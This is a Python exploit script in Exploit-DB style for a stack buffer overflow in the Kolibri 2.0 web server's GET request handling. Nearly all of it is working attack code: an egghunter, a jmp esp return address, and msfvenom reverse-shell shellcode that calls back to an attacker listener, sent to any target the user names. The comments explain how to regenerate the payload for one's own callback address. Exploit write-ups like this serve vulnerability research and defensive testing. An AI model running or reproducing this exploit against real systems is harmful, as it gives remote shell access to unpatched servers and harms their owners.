#!/usr/bin/python3
# Exploit Title: Kolibri GET request buffer Overflow [Stack Egghunter]
# Date: 2 August 2023
# Exploit Author: Mahmoud NourEldin @Engacker
# Vendor App: https://www.exploit-db.com/apps/4d4e15b98e105facf94e4fd6a1f9eb78-Kolibri-2.0-win.zip
# Version: Kolibri 2.0
# Tested on: Windows 10
# Description:
# Stack-based buffer overflow in the GET request path. EIP is overwritten with a
# "jmp esp" address; an egghunter placed at ESP then searches backwards through the
# same request for the "w00tw00t"-tagged shellcode placed at the beginning of the
# overflowed buffer and jumps to it.

import socket, time, sys, os

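# Command-line handling: exactly two positional arguments, the target IP/host
# and the TCP port of the Kolibri HTTP service.
if len(sys.argv) != 3:
    print(f"[*] Usage: {sys.argv[0]} <Ip Victime> <Port> \n[*] Exploit created by Mahmoud NourEldin\n[*] https://www.linkedin.com/in/tamatahyt")
    sys.exit(0)
host = sys.argv[1]
try:
    port = int(sys.argv[2])
except ValueError:
    # A non-numeric port would otherwise surface as an uncaught traceback.
    sys.exit(f"[!] Port must be an integer, got {sys.argv[2]!r}")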


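try:
    # Bad characters for this injection point (the GET request path):
    #   \x00 \x0a \x0d \x20 \x3d \x3f  (NUL, LF, CR, space, '=', '?')
    # Every byte that ends up in the request -- egg, shellcode, return address
    # and egghunter -- has to avoid them.
    #
    # Shellcode below was generated with the following command. It calls back to
    # 192.168.56.101:1337; regenerate it for your own LHOST/LPORT, keep the same
    # -b list, and keep egg + shellcode <= 515 bytes so the EIP offset is kept:
    #   msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.101 LPORT=1337 \
    #     EXITFUNC=thread -f py -e x86/shikata_ga_nai -b "\x00\x0a\x0d\x20\x3d\x3f"
    buf = b"w00tw00t"  # egg tag: the hunter looks for "w00t" twice in a row
    buf += b"\xba\xc7\xe5\x34\xdd\xd9\xe8\xd9\x74\x24\xf4\x58"
    buf += b"\x33\xc9\xb1\x52\x83\xe8\xfc\x31\x50\x0e\x03\x97"
    buf += b"\xeb\xd6\x28\xeb\x1c\x94\xd3\x13\xdd\xf9\x5a\xf6"
    buf += b"\xec\x39\x38\x73\x5e\x8a\x4a\xd1\x53\x61\x1e\xc1"
    buf += b"\xe0\x07\xb7\xe6\x41\xad\xe1\xc9\x52\x9e\xd2\x48"
    buf += b"\xd1\xdd\x06\xaa\xe8\x2d\x5b\xab\x2d\x53\x96\xf9"
    buf += b"\xe6\x1f\x05\xed\x83\x6a\x96\x86\xd8\x7b\x9e\x7b"
    buf += b"\xa8\x7a\x8f\x2a\xa2\x24\x0f\xcd\x67\x5d\x06\xd5"
    buf += b"\x64\x58\xd0\x6e\x5e\x16\xe3\xa6\xae\xd7\x48\x87"
    buf += b"\x1e\x2a\x90\xc0\x99\xd5\xe7\x38\xda\x68\xf0\xff"
    buf += b"\xa0\xb6\x75\x1b\x02\x3c\x2d\xc7\xb2\x91\xa8\x8c"
    buf += b"\xb9\x5e\xbe\xca\xdd\x61\x13\x61\xd9\xea\x92\xa5"
    buf += b"\x6b\xa8\xb0\x61\x37\x6a\xd8\x30\x9d\xdd\xe5\x22"
    buf += b"\x7e\x81\x43\x29\x93\xd6\xf9\x70\xfc\x1b\x30\x8a"
    buf += b"\xfc\x33\x43\xf9\xce\x9c\xff\x95\x62\x54\x26\x62"
    buf += b"\x84\x4f\x9e\xfc\x7b\x70\xdf\xd5\xbf\x24\x8f\x4d"
    buf += b"\x69\x45\x44\x8d\x96\x90\xcb\xdd\x38\x4b\xac\x8d"
    buf += b"\xf8\x3b\x44\xc7\xf6\x64\x74\xe8\xdc\x0c\x1f\x13"
    buf += b"\xb7\xf2\x48\x23\x22\x9b\x8a\x53\xa9\x62\x02\xb5"
    buf += b"\xdb\x84\x42\x6e\x74\x3c\xcf\xe4\xe5\xc1\xc5\x81"
    buf += b"\x26\x49\xea\x76\xe8\xba\x87\x64\x9d\x4a\xd2\xd6"
    buf += b"\x08\x54\xc8\x7e\xd6\xc7\x97\x7e\x91\xfb\x0f\x29"
    buf += b"\xf6\xca\x59\xbf\xea\x75\xf0\xdd\xf6\xe0\x3b\x65"
    buf += b"\x2d\xd1\xc2\x64\xa0\x6d\xe1\x76\x7c\x6d\xad\x22"
    buf += b"\xd0\x38\x7b\x9c\x96\x92\xcd\x76\x41\x48\x84\x1e"
    buf += b"\x14\xa2\x17\x58\x19\xef\xe1\x84\xa8\x46\xb4\xbb"
    buf += b"\x05\x0f\x30\xc4\x7b\xaf\xbf\x1f\x38\xcf\x5d\xb5"
    buf += b"\x35\x78\xf8\x5c\xf4\xe5\xfb\x8b\x3b\x10\x78\x39"
    buf += b"\xc4\xe7\x60\x48\xc1\xac\x26\xa1\xbb\xbd\xc2\xc5"
    buf += b"\x68\xbd\xc6"

    # Egghunter (50 bytes). It walks memory page by page, using a syscall to
    # probe whether each page is readable, and compares each dword against the
    # "w00t" tag; on two consecutive matches it jumps to the bytes right after
    # the egg, i.e. the shellcode above.
    egghunter = b"\x33\xd2\x66\x81\xca\xff\x0f\x33\xdb\x42\x53\x53\x52\x53\x53\x53"
    egghunter += b"\x6a\x29\x58\xb3\xc0\x64\xff\x13\x83\xc4\x0c\x5a\x83\xc4\x08\x3c"
    egghunter += b"\x05\x74\xdf\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xda\xaf\x75\xd7"
    egghunter += b"\xff\xe7"

    eip = b"\x42\x24\x01\x10"  # 0x10012442 (little-endian): jmp esp

    # Layout of the overflowing request path (515 + 4 + 268 = 787 bytes):
    #   [NOP sled][egg + shellcode]  -> fills offsets 0..514
    #   [eip]                        -> offset 515 (the 516th byte) overwrites the
    #                                   saved return address with "jmp esp"
    #   [egghunter][C filler]        -> this is what ESP points at; jmp esp runs the
    #                                   hunter, which finds the egg earlier in the
    #                                   same buffer and jumps to the shellcode.
    eip_offset = 515
    tail_len = 268
    if len(buf) > eip_offset:
        # A negative repeat count would silently produce an empty sled and shift
        # the return address off the saved EIP slot -- fail loudly instead.
        sys.exit(f"[!] Egg + shellcode is {len(buf)} bytes; it must fit in {eip_offset} bytes (regenerate a smaller payload).")
    if len(egghunter) > tail_len:
        sys.exit(f"[!] Egghunter is {len(egghunter)} bytes; it must fit in {tail_len} bytes.")
    payload = b"\x90" * (eip_offset - len(buf)) + buf + eip + egghunter + b"C" * (tail_len - len(egghunter))

    # Build the HTTP request. The Host header names the target we actually
    # connect to rather than a fixed lab address.
    request = b"GET /" + payload + b" HTTP/1.1\r\n"
    request += b"Host: " + f"{host}:{port}".encode() + b"\r\n\r\n"

    # Send it; the socket is closed by the context manager on every path.
    print(f"[*]Sending The Evil Paylod...\nSee your reverse shell")
    with socket.create_connection((host, port), timeout=10) as s:
        s.sendall(request)
    print("[x]Done")

# Connection failures (refused, unreachable, timeout) all derive from OSError,
# which socket.error aliases.
except socket.error as err:
    print(f"Could not connect!\n[*]Is IP correct? Is Port correct?Can you ping the machine?\n[*] {err}")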